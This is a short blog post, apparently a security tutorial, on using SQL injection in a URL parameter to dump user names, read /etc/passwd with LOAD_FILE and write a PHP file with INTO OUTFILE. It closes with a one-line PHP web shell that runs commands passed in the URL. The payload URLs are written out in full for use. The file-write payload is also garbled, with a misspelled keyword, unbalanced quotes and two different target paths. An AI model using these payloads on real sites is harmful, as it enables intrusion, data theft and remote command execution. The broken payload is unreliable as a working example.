Blog

mkind

File Write via SQL

Hi folks,

you probably know SQL injections. SQL injections provide a lot of fun concerning database manipulation. But it is also a great way to read and write files.

Consider the website example.com. In our example, the application provides a version parameter that is susceptible to SQL injections. As consequence, an attacker is enabled to do database voodoo like

http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,username FROM users--

This should return a list of user names that are stored in the table users. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.

Reading Files

The following listing is slightly edited to give us the content of the file /etc/passwd. This is done via LOAD_FILE. Note, this only works with files readable for the database user.

http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--

Writing Files

After reading files, let's go ahead writing them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.

http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,"<?php echo "hello world"; ?> INTO OUTFLIE "/var/www/vhosts/example.com/foobar.php"--

The fun part is, that our php statement is written into /var/vhosts/example.com/foobar.php. Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?> into a file readable for the web server. In case of success, the attacker has a nice remote shell by using http://example.com/foobar.php?cmd=ls -l.

Further Reading